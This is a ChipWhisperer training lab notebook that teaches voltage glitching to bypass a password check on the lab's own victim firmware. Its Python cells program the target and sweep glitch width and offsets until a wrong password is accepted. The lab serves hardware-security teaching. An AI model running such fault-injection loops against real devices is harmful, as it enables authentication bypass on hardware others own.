# Part 2, Topic 2: Voltage Glitching to Bypass Password

---
NOTE: This lab references some (commercial) training material on [ChipWhisperer.io](https://www.ChipWhisperer.io). You can freely execute and use the lab per the open-source license (including using it in your own courses if you distribute similarly), but you must maintain notice about this source location. Consider joining our training course to enjoy the full experience.

---

**SUMMARY:** *We've seen how voltage glitching can be used to corrupt calculations, just like clock glitching. Let's continue on and see if it can also be used to break past a password check.*

**LEARNING OUTCOMES:**

* Applying previous glitch settings to new firmware
* Checking for success and failure when glitching

## Firmware

Again, we've already covered this lab, so it'll be mostly up to you!

In [ ]:
SCOPETYPE = 'CWNANO'
PLATFORM = 'CWNANO'

In [ ]:
%%bash -s "$PLATFORM"
cd ../../../hardware/victims/firmware/simpleserial-glitch
make PLATFORM=$1 CRYPTO_TARGET=NONE

In [ ]:
%run "../../Setup_Scripts/Setup_Generic.ipynb"

In [ ]:
fw_path = "../../../hardware/victims/firmware/simpleserial-glitch/simpleserial-glitch-{}.hex".format(PLATFORM)
cw.program_target(scope, prog, fw_path)

In [ ]:
if PLATFORM == "CWLITEXMEGA":
    scope.clock.clkgen_freq = 32E6
    target.baud = 38400*32/7.37
    def reboot_flush():            
        scope.io.pdic = False
        time.sleep(0.1)
        scope.io.pdic = "high_z"
        time.sleep(0.1)
        #Flush garbage too
        target.flush()
else:
    scope.clock.clkgen_freq = 24E6
    target.baud = 38400*24/7.37
    def reboot_flush():            
        scope.io.nrst = False
        time.sleep(0.05)
        scope.io.nrst = "high_z"
        time.sleep(0.05)
        #Flush garbage too
        target.flush()

In [ ]:
#Do glitch loop
reboot_flush()
pw = bytearray([0x74, 0x6F, 0x75, 0x63, 0x68])
target.simpleserial_write('p', pw)

val = target.simpleserial_read_witherrors('r', 1, glitch_timeout=10)#For loop check
valid = val['valid']
if valid:
    response = val['payload']
    raw_serial = val['full_response']
    error_code = val['rv']

print(val)

In [ ]:
scope.adc.timeout = 0.1
scope.glitch.clk_src = "clkgen" # set glitch input clock
scope.glitch.output = "glitch_only" # glitch_out = clk ^ glitch
scope.glitch.trigger_src = "ext_single" # glitch only after scope.arm() called
if PLATFORM == "CWLITEXMEGA":
    scope.io.glitch_lp = True
    scope.io.glitch_hp = True
elif PLATFORM == "CWLITEARM":
    scope.io.glitch_lp = True
    scope.io.glitch_hp = True
elif PLATFORM == "CW308_STM32F3":
    scope.io.glitch_hp = True
    scope.io.glitch_lp = True

In [ ]:
import matplotlib.pylab as plt
import chipwhisperer.common.results.glitch as glitch
gc = glitch.GlitchController(groups=["success", "reset", "normal"], parameters=["width", "offset", "ext_offset"])
gc.display_stats()

In [ ]:
from importlib import reload
import chipwhisperer.common.results.glitch as glitch
from tqdm.notebook import tqdm
import re
import struct
g_step = 0.4

# insert settings you found in the last part
gc.set_range("width", 0, 47.8)
gc.set_range("offset", 0, 10)
gc.set_range("ext_offset", 11, 31)

gc.set_global_step(g_step)

scope.adc.timeout = 0.1

reboot_flush()

for glitch_settings in gc.glitch_values():
    scope.glitch.offset = glitch_settings[1]
    scope.glitch.width = glitch_settings[0]
    scope.glitch.ext_offset = glitch_settings[2]
    if scope.adc.state:
        # can detect crash here (fast) before timing out (slow)
        print("Trigger still high!")
        gc.add("reset", (scope.glitch.width, scope.glitch.offset, scope.glitch.ext_offset))
        reboot_flush()

    scope.arm()
    target.simpleserial_write('p', bytearray([0]*5))
    scope.io.glitch_hp = False
    scope.io.glitch_hp = True
    scope.io.glitch_lp = False
    scope.io.glitch_lp = True
    ret = scope.capture()

    val = target.simpleserial_read_witherrors('r', 1, glitch_timeout=10)#For loop check
    if ret:
        print('Timeout - no trigger')
        gc.add("reset", (scope.glitch.width, scope.glitch.offset, scope.glitch.ext_offset))

        #Device is slow to boot?
        reboot_flush()

    else:
        if val['valid'] is False:
            gc.add("reset", (scope.glitch.width, scope.glitch.offset, scope.glitch.ext_offset))
        else:
            if val['rv'] == 1: #for loop check
                gc.add("success", (scope.glitch.width, scope.glitch.offset, scope.glitch.ext_offset))
                print(val)
                print(val['payload'])
                print(scope.glitch.width, scope.glitch.offset, scope.glitch.ext_offset)
                print("🐙", end="")
            else:
                gc.add("normal", (scope.glitch.width, scope.glitch.offset, scope.glitch.ext_offset))

In [ ]:
scope.dis()
target.dis()